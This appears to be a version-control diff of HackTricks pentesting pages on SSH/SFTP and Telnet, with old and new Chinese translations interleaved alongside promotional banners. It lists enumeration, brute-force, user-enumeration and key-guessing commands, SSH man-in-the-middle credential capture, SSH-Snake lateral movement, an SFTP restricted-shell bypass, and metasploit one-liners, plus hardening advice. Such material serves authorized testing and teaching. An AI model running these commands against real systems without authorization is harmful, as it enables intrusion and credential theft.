学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

196
network-services-pentesting/pentesting-ssh.md
View file

@ -1,46 +1,47 @@
# 22 - 渗透测试 SSH/SFTP
# 22 - Pentesting SSH/SFTP
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**漏洞赏金提示****注册** Intigriti一个由黑客创建的高级**漏洞赏金平台**!立即加入我们,访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
**漏洞赏金提示****注册** **Intigriti**,一个由黑客为黑客创建的高级 **漏洞赏金平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## 基本信息
**SSHSecure Shell 或 Secure Socket Shell** 是一种网络协议,可在不安全的网络上实现与计算机的安全连接。在访问远程系统时,它对于维护数据的机密性和完整性至关重要。
**SSH安全外壳或安全套接字外壳)** 是一种网络协议,能够在不安全的网络上与计算机建立安全连接。它在访问远程系统时对于维护数据的机密性和完整性至关重要。
**默认端口:** 22
```
22/tcp open ssh syn-ack
```
**SSH服务器:**
**SSH 服务器:**
* [openSSH](http://www.openssh.org) OpenBSD SSH在BSD、Linux发行版和Windows自Windows 10起内置
* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) 用于内存和处理器资源较低环境的SSH实现在OpenWrt中内置
* [PuTTY](https://www.chiark.greenend.org.uk/\~sgtatham/putty/) 用于Windows的SSH实现客户端常用但服务器的使用较少
* [CopSSH](https://www.itefix.net/copssh) 用于Windows的OpenSSH实现
* [openSSH](http://www.openssh.org) OpenBSD SSH自 Windows 10 起在 BSD、Linux 发行版和 Windows 中提供
* [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) 针对内存和处理器资源有限环境的 SSH 实现,随 OpenWrt 提供
* [PuTTY](https://www.chiark.greenend.org.uk/\~sgtatham/putty/) Windows SSH 实现,客户端常用,但服务器的使用较少
* [CopSSH](https://www.itefix.net/copssh) Windows OpenSSH 实现
**SSH库(实现服务器端):**
**SSH 库(实现服务器端):**
* [libssh](https://www.libssh.org) 多平台C库实现SSHv2协议可在[Python](https://github.com/ParallelSSH/ssh-python)、[Perl](https://github.com/garnier-quentin/perl-libssh/)和[R](https://github.com/ropensci/ssh)中使用绑定被KDE用于sftpGitHub用于git SSH基础设施
* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) 用ANSI C编写的SSHv2服务器库针对嵌入式、RTOS和资源受限环境
* [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) 基于Apache MINA的Apache SSHD java
* [paramiko](https://github.com/paramiko/paramiko) Python SSHv2协议库
* [libssh](https://www.libssh.org) 多平台 C 库,实现 SSHv2 协议,支持 [Python](https://github.com/ParallelSSH/ssh-python)、[Perl](https://github.com/garnier-quentin/perl-libssh/) 和 [R](https://github.com/ropensci/ssh) 的绑定KDE 用于 sftpGitHub 用于 git SSH 基础设施
* [wolfSSH](https://www.wolfssl.com/products/wolfssh/) ANSI C 编写的 SSHv2 服务器库针对嵌入式、RTOS 和资源受限环境
* [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) 基于 Apache MINA 的 Apache SSHD Java
* [paramiko](https://github.com/paramiko/paramiko) Python SSHv2 协议库
## 枚举
@ -48,25 +49,25 @@
```bash
nc -vn <IP> 22
```
### 自动化ssh-audit
### 自动化 ssh-audit
ssh-audit是用于ssh服务器和客户端配置审计的工具。
ssh-audit 一个用于 ssh 服务器和客户端配置审计的工具。
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) 是从[https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) 更新的分支。
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) 是一个来自 [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/) 的更新分支
**特点:**
**特点**
* 支持SSH1和SSH2协议服务器;
* 分析SSH客户端配置;
* 获取横幅,识别设备或软件和操作系统,检测压缩;
* 收集密钥交换,主机密钥,加密和消息认证代码算法;
* 输出算法信息(可用自从,已移除/禁用,不安全/弱/遗留等);
* 输出算法建议(根据识别的软件版本追加或删除);
* 输出安全信息(相关问题分配的CVE列表等;
* 基于算法信息分析SSH版本兼容性;
* 来自OpenSSHDropbear SSH和libssh的历史信息;
* 在Linux和Windows上运行;
* 无依赖
* 支持 SSH1 和 SSH2 协议服务器;
* 分析 SSH 客户端配置;
* 抓取横幅,识别设备或软件和操作系统,检测压缩;
* 收集密钥交换、主机密钥、加密和消息认证码算法;
* 输出算法信息(可用自、已移除/禁用、不安全/弱/遗留等);
* 输出算法建议(根据识别的软件版本添加或移除);
* 输出安全信息(相关问题、分配的 CVE 列表等);
* 根据算法信息分析 SSH 版本兼容性;
* 来自 OpenSSH、Dropbear SSH 和 libssh 的历史信息;
* 在 Linux 和 Windows 上运行;
* 无依赖
```bash
usage: ssh-audit.py [-1246pbcnjvlt] <host>
@ -87,17 +88,17 @@ use -t to change timeout)
(default: 5)
$ python3 ssh-audit <IP>
```
### 服务器的公共SSH密钥
[See it in action (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
[查看演示Asciinema](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
### 服务器的公钥 SSH
```bash
ssh-keyscan -t rsa <IP> -p <PORT>
```
### 弱密算法
### 弱密算法
是默认由 **nmap** 发现的。但你也可以使用 **sslcan****sslyze**
可以通过**nmap**默认发现。但你也可以使用**sslcan**或**sslyze**。
### Nmap 脚本
### Nmap脚本
```bash
nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
@ -109,44 +110,44 @@ nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check a
* `ssh`
## Brute force usernames, passwords and private keys
## 暴力破解用户名、密码和私钥
### 用户名枚举
在某些版本的OpenSSH中您可以进行时间攻击以枚举用户。您可以使用metasploit模块来利用这一点
在某些版本的 OpenSSH 中,您可以进行时间攻击以枚举用户。您可以使用 metasploit 模块来利用这一点:
```
msf> use scanner/ssh/ssh_enumusers
```
### [暴力破解](../generic-methodologies-and-resources/brute-force.md#ssh)
一些常见的ssh凭据[在这里](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)和[这里](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt)以及下面。
一些常见的 ssh 凭据 [在这里](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt) [这里](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) 以及下面。
### 私钥暴力破解
如果你知道一些可以使用的ssh私钥...让我们试试。你可以使用nmap脚本:
如果你知道一些可以使用的 ssh 私钥... 那就试试吧。你可以使用 nmap 脚本:
```
https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
```
者使用MSF辅助模块:
MSF 辅助模块:
```
msf> use scanner/ssh/ssh_identify_pubkeys
```
或者使用`ssh-keybrute.py`原生python3轻量级且启用了传统算法[snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute)。
Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms enabled): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
#### 已知的糟糕密钥可以在这里找到:
#### 已知的密钥可以在这里找到:
{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %}
#### 弱SSH密钥 / Debian可预测PRNG
#### 弱SSH密钥 / Debian可预测PRNG
一些系统在用于生成加密材料的随机种子中存在已知缺陷。这可能导致密钥空间大幅缩小,从而可以进行暴力破解。在此处提供了在受弱PRNG影响的Debian系统上生成的预生成密钥集[g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)。
一些系统在生成加密材料时使用的随机种子存在已知缺陷。这可能导致密钥空间显著减少,从而可以被暴力破解。受弱PRNG影响的Debian系统上生成的预生成密钥集可以在这里找到[g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)。
您应该在这里搜索受害机器的有效密钥。
您应该在这里查找受害者机器的有效密钥。
### Kerberos
**crackmapexec** 使用`ssh`协议可以使用选项`--kerberos`来**通过kerberos进行身份验证**。\
要获取更多信息,请运行`crackmapexec ssh --help`
**crackmapexec** 使用 `ssh` 协议可以使用选项 `--kerberos` **通过kerberos进行身份验证**。\
有关更多信息,请运行 `crackmapexec ssh --help`
## 默认凭据
@ -169,43 +170,43 @@ msf> use scanner/ssh/ssh_identify_pubkeys
## SSH-MitM
如果您在受害者所在的本地网络中该受害者将使用用户名和密码连接到SSH服务器您可以尝试**执行中间人攻击以窃取这些凭据:**
如果您在本地网络中作为即将使用用户名和密码连接到SSH服务器的受害者您可以尝试 **执行MitM攻击以窃取这些凭据:**
**攻击路径:**
* **流量重定向:** 攻击者**转移**受害者的流量到其计算机,有效地**拦截**连接尝试到SSH服务器。
* **拦截和记录:** 攻击者的计算机充当**代理**通过假装是合法的SSH服务器**捕获**用户的登录详细信息。
* **命令执行和中继:** 最后,攻击者的服务器**记录用户的凭据****将命令转发**到真实的SSH服务器**执行**它们,并**将结果发送回**用户,使整个过程看起来无缝且合法。
* **流量重定向:** 攻击者 **转移** 受害者的流量到他们的机器,有效地 **拦截** 连接尝试到SSH服务器。
* **拦截和记录:** 攻击者的机充当 **代理**通过假装是合法的SSH服务器**捕获** 用户的登录信息。
* **命令执行和转发:** 最后,攻击者的服务器 **记录用户的凭据** **将命令转发** 到真实的SSH服务器 **执行** 它们,并 **将结果发送回** 用户,使过程看起来无缝且合法。
[**SSH MITM**](https://github.com/jtesta/ssh-mitm)正是描述的操作
[**SSH MITM**](https://github.com/jtesta/ssh-mitm) 完全按照上述描述进行
为了捕获执行实际中间人攻击您可以使用ARP欺骗、DNS欺骗或其他在[**网络欺骗攻击**](../generic-methodologies-and-resources/pentesting-network/#spoofing)中描述的技术。
为了捕获执行实际的MitM您可以使用ARP欺骗、DNS欺骗或在[**网络欺骗攻击**](../generic-methodologies-and-resources/pentesting-network/#spoofing)中描述的其他技术。
## SSH-Snake
如果您想要使用在系统上发现的SSH私钥在网络中遍历对每个系统上的每个主机使用每个私钥以供新主机使用那么[**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake)就是您需要的工具
如果您想使用在系统上发现的SSH私钥遍历网络利用每个系统上的每个私钥连接到新主机那么[**SSH-Snake**](https://github.com/MegaManSec/SSH-Snake) 是您所需要的
SSH-Snake自动且递归执行以下任务:
SSH-Snake自动和递归地执行以下任务:
1. 在当前系统上查找任何SSH私钥
2. 在当前系统上查找可能接受私钥的任何主机或目的地user@host
3. 尝试使用发现的所有私钥连接到所有目的地的SSH
4. 如果成功连接到目的地则在连接到的系统上重复步骤1 - 4
1. 在当前系统上查找任何SSH私钥
2. 在当前系统上查找任何主机或目标user@host这些私钥可能被接受
3. 尝试使用所有发现的私钥SSH连接到所有目标
4. 如果成功连接到某个目标,则在连接的系统上重复步骤#1 - #4
完全自我复制和自我传播 - 完全无文件。
是完全自我复制和自我传播的——并且完全无文件。
## 配置错误
### Root登录
### 登录
SSH服务器通常默认允许root用户登录这构成了重大安全风险。**禁用root登录**是保护服务器的关键步骤。通过进行此更改,可以减轻使用管理员特权的未经授权访问和暴力攻击。
SSH服务器默认允许root用户登录这构成了重大安全风险。 **禁用root登录** 是保护服务器的关键步骤。通过进行此更改,可以减轻未经授权的管理权限访问和暴力攻击的风险
**禁用OpenSSH中的Root登录:**
**在OpenSSH中禁用根登录:**
1. 使用以下命令**编辑SSH配置文件**`sudoedit /etc/ssh/sshd_config`
2. 将设置从`#PermitRootLogin yes`更改为**`PermitRootLogin no`**。
3. 使用以下命令**重新加载配置**`sudo systemctl daemon-reload`
4. **重SSH服务器**以应用更改:`sudo systemctl restart sshd`
1. **编辑SSH配置文件** `sudoedit /etc/ssh/sshd_config`
2. **将设置更改**`#PermitRootLogin yes`**`PermitRootLogin no`**。
3. **使用以下命令重新加载配置** `sudo systemctl daemon-reload`
4. **重启SSH服务器** 以应用更改: `sudo systemctl restart sshd`
### SFTP暴力破解
@ -213,9 +214,9 @@ SSH服务器通常默认允许root用户登录这构成了重大安全风险
### SFTP命令执行
在SFTP设置中经常出现一个常见的疏忽管理员希望用户在不启用远程shell访问的情况下交换文件。尽管将用户设置为非交互式shell例如`/usr/bin/nologin`)并将其限制在特定目录,但仍存在一个安全漏洞。**用户可以通过在登录后立即请求执行命令(如`/bin/bash`)来绕过这些限制**,在他们指定的非交互式shell接管之前。这允许未经授权的命令执行破坏了预期的安全措施。
在SFTP设置中常见的一个疏忽是管理员希望用户在不启用远程shell访问的情况下交换文件。尽管将用户设置为非交互式shell例如`/usr/bin/nologin`)并将其限制在特定目录,但仍存在安全漏洞。 **用户可以通过在登录后立即请求执行命令(如`/bin/bash`)来规避这些限制**,在其指定的非交互式shell接管之前。这允许未经授权的命令执行破坏了预期的安全措施。
[此处的示例](https://community.turgensec.com/ssh-hacking-guide/)
[示例来自这里](https://community.turgensec.com/ssh-hacking-guide/):
```bash
ssh -v noraj@192.168.1.94 id
...
@ -238,7 +239,7 @@ debug1: Exit status 0
$ ssh noraj@192.168.1.94 /bin/bash
```
以下是用户`noraj`的安全SFTP配置示例`/etc/ssh/sshd_config` - openSSH
这是用户 `noraj` 的安全 SFTP 配置示例(`/etc/ssh/sshd_config` openSSH
```
Match User noraj
ChrootDirectory %h
@ -248,42 +249,42 @@ PermitTunnel no
X11Forwarding no
PermitTTY no
```
这个配置将只允许 SFTP通过强制启动命令禁用 shell 访问,禁用 TTY 访问,同时禁用所有类型的端口转发或隧道。
此配置将仅允许 SFTP通过强制启动命令并禁用 TTY 访问来禁用 shell 访问,同时还禁用所有类型的端口转发或隧道。
### SFTP 隧道
### SFTP Tunneling
如果你可以访问一个 SFTP 服务器,你也可以通过这个服务器进行流量隧道,例如使用常见的端口转发:
如果您可以访问 SFTP 服务器,您还可以通过此方式隧道您的流量,例如使用常见的端口转发:
```bash
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compromised>
```
### SFTP 符号链接
### SFTP Symlink
**sftp** 命令中有 "**symlink**"。因此,如果你在某个文件夹中拥有 **可写权限**,你可以创建 **其他文件夹/文件****符号链接**。由于你可能被 **限制** 在 chroot 中,这对你来说 **不会特别有用**,但是,如果你可以从 **非 chroot 服务**(例如,如果你可以从 web 访问符号链接)中 **访问** 创建的 **符号链接**,你可以通过 web **打开符号链接的文件**
The **sftp** have the command "**symlink**". Therefore, if you have **可写权限** in some folder, you can create **symlinks** of **其他文件/文件夹**. As you are probably **被困** inside a chroot this **对你来说不会特别有用**, but, if you can **访问** the created **symlink** from a **no-chroot** **服务** (for example, if you can access the symlink from the web), you could **通过网络打开链接的文件**.
例如,要将一个新文件 **"**_**froot**_**"** 创建为指向 "**_**/**_**"** 的 **符号链接**
For example, to create a **symlink** from a new file **"**_**froot**_**" to "**_**/**_**"**:
```bash
sftp> symlink / froot
```
如果您可以通过网络访问文件"_froot_",您将能够列出系统根目录("/")
如果您可以通过网络访问文件 "_froot_",您将能够列出系统的根 ("/") 文件夹
### 认证方法
在高安全环境中通常会启用基于密钥或双因素认证而不是简单的基于密码的认证。但经常会在启用更强的认证方法的同时未禁用较弱的方法。一个常见情况是在openSSH配置中启用`publickey`并将其设置为默认方法,但未禁用`password`。因此通过使用SSH客户端的详细模式攻击者可以看到启用了较弱的方法
在高安全性环境中,通常的做法是仅启用基于密钥或双因素认证,而不是简单的基于密码的单因素认证。但通常情况下,较强的认证方法被启用而没有禁用较弱的认证方法。一个常见的情况是在 openSSH 配置中启用 `publickey` 并将其设置为默认方法,但没有禁用 `password`。因此,通过使用 SSH 客户端的详细模式,攻击者可以看到较弱的方法被启用
```bash
ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
```
例如,如果设置了身份验证失败限制,并且您从未有机会达密码方法,您可以使用`PreferredAuthentications`选项强制使用此方法。
例如,如果设置了身份验证失败限制,并且您从未有机会达密码方法,您可以使用 `PreferredAuthentications` 选项强制使用此方法。
```bash
ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
```
### 配置文件
检查SSH服务器配置是必要的以确保仅授权预期的方法。使用客户端的详细模式可以帮助查看配置的有效性。
审查SSH服务器配置是必要的以确保只有预期的方法被授权。在客户端上使用详细模式可以帮助查看配置的有效性。
### 配置文件
```bash
ssh_config
sshd_config
@ -299,12 +300,12 @@ id_rsa
## References
* You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html)
* 你可以在 [https://www.ssh-audit.com/hardening\_guides.html](https://www.ssh-audit.com/hardening\_guides.html) 找到有关如何加固 SSH 的有趣指南
* [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty tip**: **注册** **Intigriti**,一个由黑客为黑客创建的高级 **bug bounty 平台**!今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
@ -326,16 +327,17 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

52
network-services-pentesting/pentesting-telnet.md
View file

@ -1,28 +1,29 @@
# 23 - 渗透测试 Telnet
# 23 - Pentesting Telnet
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时提供的漏洞评估和渗透测试设置**。使用 20 多种工具和功能从侦察到报告运行完整的渗透测试。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、弹出 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试使用20多个工具和功能从侦察到报告。我们不取代渗透测试人员 - 我们开发自定义工具、检测和利用模块以便让他们有更多时间深入挖掘、获取shell并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## **基本信息**
Telnet 是一种网络协议,为用户提供了一种不安全的方式通过网络访问计算机。
Telnet是一种网络协议提供了一种不安全的方式让用户通过网络访问计算机。
**默认端口:** 23
```
@ -34,15 +35,15 @@ Telnet 是一种网络协议,为用户提供了一种不安全的方式通过
```bash
nc -vn <IP> 23
```
所有有趣的枚举都可以通过 **nmap** 执行:
所有有趣的枚举都可以通过 **nmap** 执行:
```bash
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
脚本`telnet-ntlm-info.nse`将获取NTLM信息Windows版本)。
The script `telnet-ntlm-info.nse` 将获取 NTLM 信息Windows 版本)。
根据[telnet RFC](https://datatracker.ietf.org/doc/html/rfc854)在TELNET协议中有各种“**选项**”将被批准,并可与“**DO, DON'T, WILL, WON'T**”结构一起使用以允许用户和服务器同意使用更复杂或者可能只是不同的TELNET连接约定集。这些选项可能包括更改字符集回显模式等。
来自 [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854):在 TELNET 协议中有各种“**选项**”,可以使用“**DO, DON'T, WILL, WON'T**”结构进行授权,以便用户和服务器同意使用更复杂(或许只是不同)的约定集进行 TELNET 连接。这些选项可能包括更改字符集、回显模式等。
**我知道可以枚举这些选项,但我不知道如何操作,所以如果您知道,请告诉我。**
**我知道可以枚举这些选项,但我不知道怎么做,所以如果你知道怎么做,请告诉我。**
### [暴力破解](../generic-methodologies-and-resources/brute-force.md#telnet)
@ -52,7 +53,7 @@ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
```
## HackTricks自动命令
## HackTricks 自动命令
```
Protocol_Name: Telnet #Protocol Abbreviation if there is one.
Port_Number: 23 #Comma separated if there is more than one.
@ -86,20 +87,21 @@ Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOS
```
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**立即提供的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试使用20多种工具和功能从侦察到报告。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块为他们节省时间深入挖掘、弹出shell并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
